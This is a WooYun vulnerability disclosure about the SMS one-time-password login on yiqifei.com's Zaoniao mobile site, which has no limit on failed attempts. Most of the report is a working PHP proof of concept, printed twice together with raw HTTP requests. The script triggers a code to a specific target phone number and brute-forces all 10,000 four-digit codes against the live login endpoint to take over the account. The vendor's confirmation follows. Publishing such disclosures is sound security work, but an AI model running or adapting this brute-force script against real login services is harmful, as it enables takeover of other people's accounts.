当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099675

漏洞标题:一起飞旗下早鸟网某设计导致可登录任意手机用户(与一起飞官方同库)

相关厂商:yiqifei.com

漏洞作者: Jim叔叔

提交时间:2015-03-06 14:01

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-06: 细节已通知厂商并且等待厂商处理中
2015-03-06: 厂商已经确认,细节仅向厂商公开
2015-03-16: 细节向核心白帽子及相关领域专家公开
2015-03-26: 细节向普通白帽子公开
2015-04-05: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

带我飞~~~

详细说明:

早鸟网登录地址:http://mzaoniao.wm.yiqifei.com/Account/Login?returnUrl=%2FMember
其中的手机动态密码登录,先用自己的手机试了一下,收到的是4位数字验证码,

1.png


随便输错误的数字试了几十次,没有限制错误次数,有戏

2.png


丢到burp暴力猜解了一下,当验证码正确时,由于burp不能匹配结果包含某字符串时停止,所以会继续尝试错误的验证码,导致不能进到用户界面。

3.png


于是手写了一个poc,分分钟登录任意手机账号:

<?php
$tel = '13186983074'; //目标手机号
//先发送动态密码到手机
curlpost("mobile=$tel",'http://mzaoniao.wm.yiqifei.com/Account/SendSMSCode');
//登录url
$url = 'http://mzaoniao.wm.yiqifei.com/Account/Login?returnUrl=%2FMember';
//暴力猜解4位数字验证码
for($i=0;$i<=9999;$i++)
{
	$code = sprintf("%04d", $i);
	$data = "Mobile=$tel&Code=$code&Type=2";
	$result = curlpost($data, $url);
	//如果返回结果不包含"错误",则表示验证码正确,跳转到用户信息页面
	if(FALSE == strpos($result, '错误'))
	{
		echo '<script>window.location="http://mzaoniao.wm.yiqifei.com/Member"</script>';
		break;
	}
}
function curlpost($data,$url) //curlpost 函数
{
	$ch = curl_init();//初始化curl  
	curl_setopt($ch,CURLOPT_URL,$url);//抓取指定网页  
	curl_setopt($ch, CURLOPT_HEADER, 0);//设置header  
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上  
	curl_setopt($ch, CURLOPT_POST, 1);//post提交方式  
	curl_setopt($ch, CURLOPT_POSTFIELDS, $data); //post data
	$result = curl_exec($ch);//运行curl  
	curl_close($ch);  
	return $result;
}


4.png

漏洞证明:

//发送验证码接口
POST /Account/SendSMSCode HTTP/1.1
Host: mzaoniao.wm.yiqifei.com
mobile=13186983074
//验证接口
POST /Account/Login?returnUrl=%2FMember HTTP/1.1
Host: mzaoniao.wm.yiqifei.com
Mobile=13186983074&Code=0735&Type=2

<?php
$tel = '13186983074'; //目标手机号
//先发送动态密码到手机
curlpost("mobile=$tel",'http://mzaoniao.wm.yiqifei.com/Account/SendSMSCode');
//登录url
$url = 'http://mzaoniao.wm.yiqifei.com/Account/Login?returnUrl=%2FMember';
//暴力猜解4位数字验证码
for($i=0;$i<=9999;$i++)
{
	$code = sprintf("%04d", $i);
	$data = "Mobile=$tel&Code=$code&Type=2";
	$result = curlpost($data, $url);
	//如果返回结果不包含"错误",则表示验证码正确,跳转到用户信息页面
	if(FALSE == strpos($result, '错误'))
	{
		echo '<script>window.location="http://mzaoniao.wm.yiqifei.com/Member"</script>';
		break;
	}
}
function curlpost($data,$url) //curlpost 函数
{
	$ch = curl_init();//初始化curl  
	curl_setopt($ch,CURLOPT_URL,$url);//抓取指定网页  
	curl_setopt($ch, CURLOPT_HEADER, 0);//设置header  
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上  
	curl_setopt($ch, CURLOPT_POST, 1);//post提交方式  
	curl_setopt($ch, CURLOPT_POSTFIELDS, $data); //post data
	$result = curl_exec($ch);//运行curl  
	curl_close($ch);  
	return $result;
}


4.png

修复方案:

带我飞~~~

版权声明:转载请注明来源 Jim叔叔@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-06 14:16

厂商回复:

感谢对一起飞关注,已安排修复。

最新状态:

暂无